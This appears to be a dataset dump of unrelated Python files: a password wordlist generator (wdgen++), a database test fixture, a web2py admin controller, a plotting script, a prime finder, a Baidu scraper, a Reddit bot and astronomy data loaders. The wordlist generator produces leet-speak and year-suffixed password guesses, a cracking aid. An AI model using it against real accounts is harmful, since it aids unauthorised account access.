leters:\n bleetpacial+=a.upper()\n else:\n bleetpacial+=a\n baseleet=bleetpacial.replace(\"a\",\"4\")\n baseleet=baseleet.replace(\"e\",\"3\")\n bleetpacial=baseleet.replace(\"o\",\"0\")\n\ndef especial_substituir():\n global esp1\n global esp2\n global esp3\n global esp4\n global esp5\n global esp6\n global esp7\n global esp8\n global esp9\n global esp10\n esp1=base.replace(\"a\",\"@\")\n esp2=base.replace(\"e\",\"&\")\n esp3=base.replace(\"e\",\"€\")\n esp4=base.replace(\"s\",\"$\")\n esp5=base.replace(\"c\",\"¢\")\n esp6=esp1.replace(\"e\",\"&\")\n esp7=esp1.replace(\"e\",\"€\")\n esp8=esp7.replace(\"c\",\"¢\")\n esp9=esp4.replace(\"a\",\"@\")\n esp10=esp8.replace(\"s\",\"$\")\n\ndef youiscomplicated():\n global comp1\n global comp2\n global comp3\n global comp4\n global comp5\n global comp6\n global comp7\n global comp8\n global comp9\n global comp10\n global comp11\n global comp12\n comp1=base.replace(\"a\",\"A\")\n comp2=comp1.replace(\"e\",\"3\")\n comp3=comp2.replace(\"o\",\"0\")\n comp4=comp3.replace(\"s\",\"5\")\n comp5=base.replace(\"e\",\"E\")\n comp6=comp5.replace(\"a\",\"4\")\n comp7=comp6.replace(\"o\",\"0\")\n comp8=comp7.replace(\"s\",\"5\")\n comp9=base.replace(\"o\",\"O\")\n comp10=comp9.replace(\"a\",\"4\")\n comp11=comp10.replace(\"e\",\"3\")\n comp12=comp11.replace(\"s\",\"5\")\n\ndef up_fist():\n global first_letter\n first_letter = base.replace(base[0],base[0].upper())\n\ndef up_up():\n global fim\n fim=\"\"\n cont=0\n for a in base:\n if cont%2 == 0:\n fim+=a.replace(a,a.upper())\n else:\n fim+=a\n cont+=1\n\n\ndef parcial_upper_leet():\n global leters\n leters=[\"b\",\"c\",\"d\",\"f\",\"g\",\"h\",\"j\",\"k\",\"l\",\"m\",\"n\",\"p\",\"q\",\"r\",\"s\",\"t\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n global baseupperleet\n baseupperleet=\"\"\n for a in base:\n if a in leters:\n baseupperleet+=a.upper()\n else:\n if a == \"a\":\n baseupperleet+=a.replace(\"a\",\"4\")\n elif a == \"e\":\n baseupperleet+=a.replace(\"e\",\"3\")\n elif a == \"o\":\n baseupperleet+=a.replace(\"o\",\"0\")\n elif a == \"i\":\n baseupperleet+=a.replace(\"i\",\"!\")\n\nleet_lite()\nleet_medio()\nleet_foda()\nbase_parcial_upper()\nvogalupper()\nbase_upper()\nleet_parcialupper()\nespecial_substituir()\nyouiscomplicated()\nup_fist()\nup_up()\nparcial_upper_leet()\n\nif not baseleetlite in wdbase:\n wdbase+=[baseleetlite]\nif not baseleetmedio in wdbase:\n wdbase+=[baseleetmedio]\nif not baseupper in wdbase:\n wdbase+=[baseupper]\nif not baseup in wdbase:\n wdbase+=[baseup]\nif not bleetpacial in wdbase:\n wdbase+=[bleetpacial]\n\nwdbase+=[first_letter]\n\nwdbase+=[base]\n\nwdbase+=[esp1,esp2,esp3,esp4,esp5,esp6,esp7,esp8,esp9,esp10]\n\nwdbase+=[esp1.upper(),esp2.upper(),esp3.upper(),esp4.upper(),esp5.upper(),esp6.upper(),esp7.upper(),esp8.upper(),esp9.upper(),esp10.upper()]\n\nwdbase+=[comp1,comp2,comp3,comp4,comp5,comp6,comp7,comp8,comp9,comp10,comp11]\n\nwdbase+=[fim,baseupperleet]\n\ndef rm_repete():\n for a in wdbase:\n if wdbase.count(a) > 1:\n while not wdbase.count(a) == 1:\n wdbase.remove(a)\n\nrm_repete()\n\nfor a in wdbase:\n wordlist.write(a+\"\\n\")\n wordlist.write(a+\"@\\n\")\n wordlist.write(a+\"#\\n\")\n wordlist.write(a+\"$\\n\")\n wordlist.write(a+\"%\\n\")\n wordlist.write(a+\"&\\n\")\n wordlist.write(a+\"_\\n\")\n wordlist.write(a+\"_@\\n\")\n wordlist.write(a+\"_#\\n\")\n wordlist.write(a+\"_$\\n\")\n wordlist.write(a+\"_%\\n\")\n wordlist.write(a+\"_&\\n\")\n\ncont=0\nfor a in wdbase:\n cont=0\n while not cont == 100:\n wordlist.write(a+str(cont)+\"\\n\")\n #if you need,Put \"#\" 
(comment) in one of these two lines below\n wordlist.write(a+\"_\"+str(cont)+\"\\n\")\n wordlist.write(a+\"-\"+str(cont)+\"\\n\")\n cont+=1\n\n\n#if you wanna edit for decrease or increase the number of wordlist,\n#edit the var cont1.\n\ncont1=1970\nfor a in wdbase:\n cont1=1970\n while not cont1 == 2021:\n wordlist.write(a+str(cont1)+\"\\n\")\n wordlist.write(a+\"_\"+str(cont1)+\"\\n\")\n wordlist.write(a+\"-\"+str(cont1)+\"\\n\")\n cont1+=1\n\n\nfor a in wdbase:\n contf=100\n while not contf == 999:\n wordlist.write(a+str(contf)+\"\\n\")\n #wordlist.write(a+\"_\"+str(contf)+\"\\n\")\n #wordlist.write(a+\"-\"+str(contf)+\"\\n\")\n contf+=1\n\ncont=100\nwhile not cont == 1000:\n #wordlist.write(base+str(cont)+\"\\n\")\n cont+=1\n\n\nprint(\"\\n\\nIf you think tht the wordlists gerated is very big, please, edit de source code of the wdgen++ in script/wdgen++/wdgen++.py\\n\\n\")\n\ntime.sleep(2)\n","sub_path":"scripts/wdgen++/wdgen++.py","file_name":"wdgen++.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"273932159","text":"#\n# This is the Robotics Language compiler\n#\n# Language.py: Definition of the language for this package\n#\n# Created on: 19 February, 2019\n# Author: Gabriel Lopes\n# Licence: license\n# Copyright: copyright\n#\n\nlanguage = {}\n\ndefault_output = ''","sub_path":"RoboticsLanguage/Outputs/FaultDetectionHeartbeat/Language.py","file_name":"Language.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58421064","text":"\nimport pymysql.cursors\nfrom model.group import Group\nfrom model.add_new import AddNew\nimport re\n\nclass DbFixture:\n\n def __init__(self, host, name, user, password):\n self.host = host\n self.name = name\n self.user = user\n self.password = password\n self.connection = pymysql.connect(host=host, database=name, user=user, password=password, autocommit=True)\n # autocommit убирает кэширование в базе, чтобы после изменений в проверках обновлялось количество групп\n\n def get_group_list(self):\n list = []\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select group_id, group_name, group_header, group_footer from group_list\")\n for row in cursor:\n (id, name, header, footer) = row\n list.append(Group(id=str(id), name=name, header=header, footer=footer))\n finally:\n cursor.close()\n return list\n\n\n def get_contact_list(self):\n list = []\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select id, firstname, lastname, address, home, mobile, work, email, email2, email3, phone2 from addressbook where deprecated='0000-00-00 00:00:00'\")\n for row in cursor:\n (id, firstname, lastname, address, home, mobile, work, email, email2, email3, phone2) = row\n current_contact = AddNew(my_id=str(id), my_f_name=firstname, my_l_name=lastname, my_home_address=address,\n my_h_telefon=home, my_mobile=mobile, my_work_telefon=work, my_secondary_phone=phone2,\n my_company_mail=email, my_second_mail=email2, my_third_mail=email3\n )\n final_contact = AddNew(my_id=str(id), my_f_name=self.removing_spaces(firstname),\n my_l_name=self.removing_spaces(lastname),\n my_home_address=self.removing_spaces(address)\n )\n final_contact.all_phones_from_home_page = self.merge_phones_like_on_home_page(current_contact)\n final_contact.all_emails_from_home_page = self.merge_emails_like_on_home_page(current_contact)\n list.append(final_contact)\n\n finally:\n 
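The chains of .replace() calls in the wordlist generator above can be collapsed into one pass with str.translate; a sketch mirroring leet_medio():

LEET_MEDIO = str.maketrans({'a': '4', 'e': '3', 'o': '0',
                            't': '7', 'l': '1', 's': '5'})
print('password'.translate(LEET_MEDIO))   # -> p455w0rd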
cursor.close()\n return list\n\n\n def destroy(self):\n self.connection.close()\n\n def clear(self, s):\n return re.sub(\"[() -]\", \"\", s)\n\n def merge_phones_like_on_home_page(self, contacts):\n # filter - drop the None elements, map - strip extra characters from the contacts, filter - keep only non-empty values\n return \"\\n\".join(filter(lambda x: x != \"\",\n map(lambda x: self.clear(x),\n filter(lambda x: x is not None,\n [contacts.my_h_telefon, contacts.my_mobile, contacts.my_work_telefon,\n contacts.my_secondary_phone]))))\n\n def merge_emails_like_on_home_page(self, contacts):\n # filter - drop the None elements, map - strip extra characters from the contacts, filter - keep only non-empty values\n return \"\\n\".join(filter(lambda x: x != \"\",\n map(lambda x: self.clear(x),\n filter(lambda x: x is not None,\n [contacts.my_company_mail, contacts.my_second_mail, contacts.my_third_mail]))))\n\n def removing_spaces(self, s):\n return re.sub(\" \", \" \", s.strip())","sub_path":"fixture/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"30567154","text":"\"\"\"\nA controller holding functions that are accessible only to managers\n\n\n## - manage_groups \n\n## - manage_users\n## - manage_users_approve\n## - manage_users_deny\n\n## - manage_innovations\n## - manage_innovations_approve\n\n## - new_product_category\n## - list_product_category\n## - edit_product_category\n\n## - new_value_chain\n## - list_value_chain\n## - edit_value_chain\n\n## - new_enterprise_size\n## - list_enterprise_size\n## - edit_enterprise_size\n\n## - new_type\n## - list_type\n## - edit_type\n\n## - new_ipr_protection\n## - list_ipr_protection\n## - edit_ipr_protection\n\n## - new_application\n## - list_application\n## - edit_application\n\n## - new_organization\n## - list_organization\n## - edit_organization\n\n\"\"\"\n\n\nimport re, time, datetime\n#-------------------------MANAGERS BLOCK---------------------------\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_groups():\n return dict(form=SQLFORM.grid(db.auth_membership, csv=False, searchable=False, editable=False))\n\n#--------------------------MANAGE NEW USERS------------------------\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users():\n \"\"\"\n list all users that have registration_key = 'pending'\n these are users who registered but were not approved by an admin\n \"\"\"\n query = (db.auth_user.registration_key == 'pending')\n new_users = db(query).select(db.auth_user.id\n ,db.auth_user.first_name\n ,db.auth_user.last_name\n ,db.auth_user.email\n ,db.auth_user.organization_name\n )\n\n query = (db.auth_user.registration_key == '')\n existing_users = db(query).select(db.auth_user.id\n ,db.auth_user.first_name\n ,db.auth_user.last_name\n ,db.auth_user.email\n ,orderby=db.auth_user.last_name\n )\n if not (new_users or existing_users):\n session.flash = 'There are no users to approve.'\n redirect(URL('default', 'index'))\n return dict(new_users=new_users, existing_users=existing_users)\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users_approve():\n form = SQLFORM.factory(\n Field(\n 'first_name',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.first_name).first().first_name,\n writable=False,\n ),\n Field(\n 'last_name',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.last_name).first().last_name,\n 
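The filter/map/filter chains in fixture/db.py above compress four steps into one expression; an equivalent plain-loop rendering (the sample values are made up):

import re

def merge_fields(fields):
    merged = []
    for field in fields:
        if field is None:
            continue                             # drop missing fields
        cleaned = re.sub(r'[() -]', '', field)   # strip formatting characters
        if cleaned:
            merged.append(cleaned)               # keep only non-empty strings
    return '\n'.join(merged)

print(merge_fields(['+1 (555) 123', None, '', '555-999']))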
writable=False,\n ),\n Field(\n 'email',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.email).first().email,\n writable=False,\n ),\n Field(\n 'user_comments',\n default=db(db.auth_user.id == request.args(0, cast=int)).select(db.auth_user.organization_name).first().organization_name,\n writable=False,\n ),\n Field(\n 'organization',\n requires=IS_IN_DB(db, db.organization.id, '%(name)s')\n ),\n )\n if form.process().accepted:\n db(db.auth_user.id == request.args(0, cast=int)).update(organization_id=form.vars.organization)\n db(db.auth_user.id == request.args(0, cast=int)).update(registration_key='')\n session.flash = 'User Approved'\n redirect(URL('managers', 'manage_users'))\n return dict(form=form)\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users_deny():\n db(db.auth_user.id == request.args(0, cast=int)).delete()\n session.flash = 'User Denied.'\n redirect(URL('managers', 'manage_users'))\n return None\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_users_block():\n db(db.auth_user.id == request.args(0, cast=int)).update(registration_key='blocked')\n session.flash = 'User Blocked.'\n redirect(URL('managers', 'manage_users'))\n return None\n#------------------------------------------------------------------\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_innovations():\n \"\"\"\n list all innovations that have flag is_approve = FALSE\n \"\"\"\n query = (db.innovation.is_approved == '0')\n results = db(query).select(db.innovation.id\n , db.innovation.name\n , db.innovation.created_on\n , db.innovation.created_by\n , orderby=~db.innovation.created_on)\n if not results:\n session.flash = 'There are no innovations to approve.'\n redirect(URL('default', 'index'))\n return dict(results=results)\n\n\n@auth.requires(auth.has_membership(group_id='managers'))\ndef manage_innovations_approve():\n \"\"\"\n event: button 'approve' was clicked on 'manage_innovations' form\n update flag is_approved to TRUE for corresponding innovation.id\n \"\"\"\n db(db.innovation.id == request.args(0, cast=int)).update(is_approved='1')\n backup() # call backup function from db_zef.py model to backup entire database\n session.flash = 'Innovation Approved.'\n redirect(URL('managers', 'manage_innovations'))\n return None\n#------------------------------------------------------------------\n\n\n# ------------------ View and Edit Dictionaries -------------\n@auth.requires_login()\ndef new_product_category():\n form = SQLFORM(db.product_category)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_product_category'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_product_category():\n results = db(db.product_category).select(db.product_category.ALL, \\\n orderby=[db.product_category.level_1, \\\n db.product_category.level_2, \\\n db.product_category.level_3])\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_product_category():\n form = SQLFORM(db.product_category, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_product_category'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_value_chain():\n form = SQLFORM(db.value_chain)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_value_chain'))\n return 
dict(form=form)\n\n@auth.requires_login()\ndef list_value_chain():\n results = db(db.value_chain).select(db.value_chain.ALL, orderby=db.value_chain.order_priority)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_value_chain():\n form = SQLFORM(db.value_chain, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_value_chain'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_enterprise_size():\n form = SQLFORM(db.enterprise_size)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_enterprise_size'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_enterprise_size():\n results = db(db.enterprise_size).select(db.enterprise_size.ALL, orderby=db.enterprise_size.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_enterprise_size():\n form = SQLFORM(db.enterprise_size, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_enterprise_size'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_type():\n form = SQLFORM(db.type)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_type'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_type():\n results = db(db.type).select(db.type.ALL, orderby=db.type.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_type():\n form = SQLFORM(db.type, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_type'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_ipr_protection():\n form = SQLFORM(db.ipr_protection)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_ipr_protection'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_ipr_protection():\n results = db(db.ipr_protection).select(db.ipr_protection.ALL, orderby=db.ipr_protection.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_ipr_protection():\n form = SQLFORM(db.ipr_protection, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_ipr_protection'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_application():\n form = SQLFORM(db.application)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_application'))\n return dict(form=form)\n\n@auth.requires_login()\ndef list_application():\n results = db(db.application).select(db.application.ALL, orderby=db.application.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_application():\n form = SQLFORM(db.application, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_application'))\n return dict(form=form)\n\n#--------------------------------------------------------\n@auth.requires_login()\ndef new_organization():\n form = SQLFORM(db.organization)\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_organization'))\n return 
dict(form=form)\n\n@auth.requires_login()\ndef list_organization():\n results = db(db.organization).select(db.organization.ALL, orderby=db.organization.name)\n return dict(results=results)\n\n@auth.requires_login()\ndef edit_organization():\n form = SQLFORM(db.organization, request.args(0, cast=int))\n if form.process().accepted:\n session.flash = 'Record updated.'\n redirect(URL('managers', 'list_organization'))\n return dict(form=form)\n# ------------------ end of View and Edit Dictionaries -------------\n","sub_path":"controllers/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"477446409","text":"from eim.settings_loader import GeneralSettings, DataSettings\nfrom eim.common import DictClass\nfrom eim.data import loadData\nfrom eim.spike_train import train_sec2ms\nfrom figure_helper import plotSTPFig\nimport matplotlib.pyplot as plt\n\n\n########## PLOTTING SETTINGS ##########\ntrain_start_time_ms = 0\ntrain_end_time_ms = 2500\nmax_nrns_to_plot = 200\n#################################################\n\n########## LOAD DATA ##########\nter = DictClass(loadData('results/testing_short.shelf'))\nted = DictClass(loadData('data/testing_short.shelf'))\nanr = DictClass(loadData('results/analysis.shelf'))\n#################################################\n\n# LOAD SETTINGS\ngs = GeneralSettings()\nds = DataSettings(gs.dataPath + gs.dataSettings)\n\n# PREPARE\nIDs = ds.patternIDs\ntrain = ted.train\npd = train.pd\npatlen = train.patlen\npc = [(0.0, 0.3, 1.0), (0.0, 0.8, 0.0)]\n\n# input neurons spikes\nspikesIN_ms = train_sec2ms(ter.spikes['in'])[::2] # take every 2nd\n\n# excitatory neurons spikes\nspikesE_ms = train_sec2ms(ter.spikes['e'])\n# pattern prefered neurons - spikes\nP1_spikesE_ms = [spikesE_ms[i] for i in anr.nrns_inds_P1]\nP2_spikesE_ms = [spikesE_ms[i] for i in anr.nrns_inds_P2]\n#non prefered neurons - subset\nrest_spikesE_ms = [spikesE_ms[i] for i in anr.nrns_nondist][:max_nrns_to_plot - len(P1_spikesE_ms)-len(P2_spikesE_ms)]\n\n# inhibitory neurons spikes\nspikesI_ms = train_sec2ms(ter.spikes['i'])[::2] # take every 2nd\n\n\n# PLOT FIGURE\nplotSTPFig(train, pd, patlen, ted.pg, \n\t\t train_start_time_ms, train_end_time_ms, IDs, pc, \n\t\t spikesIN_ms, P1_spikesE_ms, P2_spikesE_ms, rest_spikesE_ms, spikesI_ms, \n\t\t anr.nrntracesP1_P1, anr.nrntracesP1_P2, anr.nrntracesP2_P1, anr.nrntracesP2_P2)\n\n# SAVE FIGURE\nplt.savefig('plots/fig.png', dpi=600)\nplt.savefig('plots/fig.eps')\n","sub_path":"simulations/stp/show_figure.py","file_name":"show_figure.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"352674979","text":"from math import sqrt\n\nPRIMELIST = [2,3]\n\ndef intInput(msg, errmsg):\n while True:\n try:\n return int(input(msg))\n except ValueError:\n print(errmsg)\n\ndef isPrime(n):\n global PRIMELIST\n \n for p in PRIMELIST:\n if n%p == 0:\n return False\n elif p >= sqrt(n):\n return True\n \ndef finder(limit):\n global PRIMELIST\n \n p = PRIMELIST[len(PRIMELIST)-1]\n while p <= limit:\n p+=2\n if isPrime(p):\n PRIMELIST.append(p)\n \ndef main():\n finder(intInput(\"Enter limit: \", \"Not an integer!\"))\n print(PRIMELIST)\n\nmain()\n","sub_path":"asd.py","file_name":"asd.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} 
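Each dictionary table in the managers controller above repeats the same new/list/edit trio; in web2py the three functions can be generated once per table (SQLFORM, db, URL, session, request, and redirect are injected by the framework's controller environment; this factory is a sketch, not part of the original controller):

def make_crud(table_name, list_action, order_field):
    def new():
        form = SQLFORM(db[table_name])
        if form.process().accepted:
            session.flash = 'Record updated.'
            redirect(URL('managers', list_action))
        return dict(form=form)

    def list_all():
        return dict(results=db(db[table_name]).select(db[table_name].ALL,
                                                      orderby=order_field))

    def edit():
        form = SQLFORM(db[table_name], request.args(0, cast=int))
        if form.process().accepted:
            session.flash = 'Record updated.'
            redirect(URL('managers', list_action))
        return dict(form=form)

    return new, list_all, edit

# e.g.: new_type, list_type, edit_type = make_crud('type', 'list_type', db.type.name)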
+{"seq_id":"88727586","text":"#_*_ coding:utf-8 _*_\n__author__ = \"Ink.white\"\n\nimport urllib.request\nimport re\n\nkw = \"apple\"\nkw = urllib.request.quote(kw)\nfor i in range(1,11):\n url = \"https://www.baidu.com/s?wd=\"+kw+\"&pn=\"+str((i-1)*10)\n pat1 = \"'title':'(.*?)',\"\n pat2 = '\"title\":\"(.*?)\",'\n data = urllib.request.urlopen(url).read().decode(\"utf-8\")\n\n result1 = re.compile(pat1).findall(data)\n result2 = re.compile(pat2).findall(data)\n for z in range(0,len(result1)):\n print(result1[z])\n\n for x in range(0,len(result2)):\n print(result2[x])","sub_path":"Python3网络爬虫视频练习/爬虫_模拟httpGetRequest.py","file_name":"爬虫_模拟httpGetRequest.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"87040466","text":"import praw\nimport json\nfrom collections import defaultdict\nfrom google.cloud import storage\nimport hashlib\nfrom OAuthor import *\nfrom BotService import *\n\n\nclass RedditBot:\n\n # if OAuth is not already created, need to call OAuth script\n def __init__(self, path: str, gcp: bool = True, testing: bool = False):\n self.path = path\n if not testing:\n if gcp:\n self.config = self.loadRemoteConfig(path)\n\n else:\n self.config = self.loadLocalConfig(path)\n\n auth = self.isUnauthorized()\n print(\"authorized: \", self.isUnauthorized())\n\n # TODO check valid status and configure error message\n # do this in pytest?\n\n self.services = self.configureServices()\n print(\"Services: \", self.services)\n self.client = self.authenticate()\n\n # TODO - generate empty output structure if no file exists for output\n\n # TODO - check for previous post logs to read in\n # or just read in previous output data object for incrementing\n self.post_log = defaultdict(lambda: {\"visited\": 0, \"date\": None})\n else:\n self.services = None\n self.config = None\n self.client = None\n self.post_log = None\n\n # replace with loadRemote once GCP is implemented\n def loadLocalConfig(self, path: str):\n print(\"loading config\")\n with open(path, 'r') as f:\n return json.load(f)\n\n # check to see if we have client_id and client_secret\n def isUnauthorized(self):\n if not self.config['auth']['client_id'] or not self.config['auth']['client_secret']:\n return self.generateOAuth()\n elif self.config['auth']['client_id'].isspace() or self.config['auth']['client_secret'].isspace():\n return self.generateOAuth()\n elif self.config['auth']['client_id'] == self.config['auth']['client_secret']:\n return self.generateOAuth()\n else:\n self.config['status']['online'] = True\n self.updateRemoteConfig()\n return True\n\n # log in to reddit\n def authenticate(self):\n print(\"authenticating client\")\n return praw.Reddit(client_id=self.config['auth']['client_id'],\n client_secret=self.config['auth']['client_secret'],\n password=self.config['auth']['password'],\n user_agent=self.config['auth']['user_agent'],\n username=self.config['auth']['username'])\n\n # create BotService objects from config parameters\n def configureServices(self):\n services = self.config['services']\n service_objects = []\n print(\"configureServices\")\n for service in services:\n if 'fandom' in service['service_name']:\n service_objects.append(FandomService(service))\n elif \"translate\" in service['service_name']:\n service_objects.append(TranslateService(service))\n return service_objects\n\n # call each service's .run() method on each subreddit\n def run(self):\n try:\n print('+'.join(self.config['subreddits']))\n for comment in 
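The Baidu scraper just above URL-encodes its keyword through urllib.request.quote; in Python 3 that name is a re-export from urllib.parse, which is the clearer import (the sample keyword is made up):

from urllib.parse import quote

kw = quote('apple pie')                            # 'apple%20pie'
url = 'https://www.baidu.com/s?wd=' + kw + '&pn=0'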
self.client.subreddit('+'.join(self.config['subreddits'])).stream.comments(skip_existing=True):\n for service in self.services:\n service.run(comment)\n except:\n self.config['status']['online'] = False\n self.updateRemoteConfig()\n\n # read the config file from GCP\n def loadRemoteConfig(self, gcp_url: str):\n storage_client = storage.Client.from_service_account_json(\n './credentials/baas.json')\n blobs = storage_client.list_blobs('bot-configurations')\n for blob in blobs:\n print(blob.name)\n if blob.name == self.path:\n json_data = blob.download_as_string(\n client=None).decode(\"utf-8\")\n return json.loads(json_data)\n bucket = storage_client.get_bucket('bot-configurations')\n try:\n blob = bucket.get_blob(self.path + '.json')\n except:\n blob = bucker.get_blob(self.path)\n\n json_data = blob.download_as_string(client=None).decode(\"utf-8\")\n return json.loads(json_data)\n\n # update config file with status['online'] = True (and status['valid'] = True ?)\n # populate the OAuth fields for the config update\n def updateRemoteConfig(self):\n storage_client = storage.Client.from_service_account_json(\n \"./credentials/baas.json\")\n bucket = storage_client.get_bucket('bot-configurations')\n blobs = storage_client.list_blobs('bot-configurations')\n for blob in blobs:\n print(blob.name)\n if blob.name == self.path:\n blob.upload_from_string(json.dumps(self.config, indent=2))\n return\n\n # hasher = hashlib.md5()\n # hasher.update(bytes(self.config['auth']['username'],\"utf-8\"))\n # blob = bucket.blob(self.path)\n # blob.upload_from_string(json.dumps(self.config,indent=2))\n\n def generateOAuth(self):\n\n author = OAuthor(self.config['auth'], self.config['version_info'])\n client_id, client_secret = author.mechanizedLogin()\n # = author.retrieveTokens()\n if client_secret == client_id:\n # print(\"something went wrong, OAuth not present\")\n # time.sleep(5)\n # author.createApp()\n # client_secret, client_id = author.retrieveTokens()\n # # author.deleteApp()\n # author.powerDown()\n # self.config['auth']['client_id'] = client_id\n # self.config['auth']['client_secret'] = client_secret\n # self.updateRemoteConfig()\n return False\n else:\n self.config['auth']['client_id'] = client_id\n self.config['auth']['client_secret'] = client_secret\n self.config['status']['online'] = True\n self.client = self.authenticate()\n if self.client.user.me() == self.config['auth']['username']:\n self.updateRemoteConfig()\n return True\n\n # TODO - read/write service data to GCP\n\n def postOutputData(self, gcp_url: str):\n # should I log direct messages and responses here or separately?\n pass\n\n def pullOutputData(self, gcp_url: str):\n pass\n\n # TODO - check if a reddit app exists on this account already. 
if so, just grab the credentials\n\n def hasApp(self):\n pass\n\n\nif __name__ == '__main__':\n r = RedditBot(\"9f05059f393732565ec85b18c5d05866\", gcp=True)\n r.run()\n\n# \tpass\n","sub_path":"back_end/python-bot/RedditBot.py","file_name":"RedditBot.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"114435267","text":"import os\nimport h5py\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom astropy.visualization import (ZScaleInterval, ImageNormalize)\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport csv\n\n#global variables\ncutout_dir = os.path.expandvars(\"$SCRATCH\") + \"/\"\nimage_dir = \"/home/anahoban/projects/rrg-kyi/astro/cfis/W3/\"\n\n#with open(cutout_dir + 'tiles_5channel_41tiles.csv', newline='') as f:\n # reader = csv.reader(f)\n # data = list(reader)\n \n#tile_ids = [i[0] for i in data]\n\ndef get_test_cutouts(index, tile_ids, n_cutouts, cutout_size, bands=\"cfis\", start=0):\n n = 0\n if bands == \"all\":\n band_indices = [0, 1, 2, 3, 4]\n l = len(band_indices)\n sources = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n weights = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n \n \n elif bands == \"cfis\":\n band_indices = [2]\n l = len(band_indices)\n sources = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n weights = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n \n else: # PS1\n band_indices = [1, 3, 4]\n l = len(band_indices)\n sources = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n weights = np.zeros((n_cutouts, cutout_size, cutout_size, l))\n \n img_group = hf.get(tile_ids[index] + \"/IMAGES\")\n wt_group = hf.get(tile_ids[index] + \"/WEIGHTS\")\n for i in range(start, len(img_group)):\n sources[n,:,:,:] = np.array(img_group.get(f\"c{i}\"))[:,:,band_indices]\n weights[n,:,:,:] = np.array(wt_group.get(f\"c{i}\"))[:,:,band_indices]\n n += 1\n if n == n_cutouts:\n #return sources #if no weights\n return np.concatenate((sources, weights),axis=-1) #if we train with weights\n \ndef get_cutouts(hf, tile_ids,tile_indices, batch_size, cutout_size, bands=\"all\"):\n ''' Input: hf file, tile indices, batch size, dimensions, band and bands\n Output: the img and weight cutouts for the test set as (batch_size, pix, pix, channels) '''\n b = 0 # counter for batch\n if bands == \"all\":\n band_indices = [0, 1, 2, 3, 4]\n elif bands == \"cfis\":\n band_indices = [2]\n l = len(band_indices)\n elif bands == \"ps1\":\n band_indices = [1, 3, 4]\n else:\n print('WARNING: unrecognized band')\n band_indices = [0] \n \n l = len(band_indices)\n sources = np.zeros((batch_size, cutout_size, cutout_size, l))\n weights = np.zeros((batch_size, 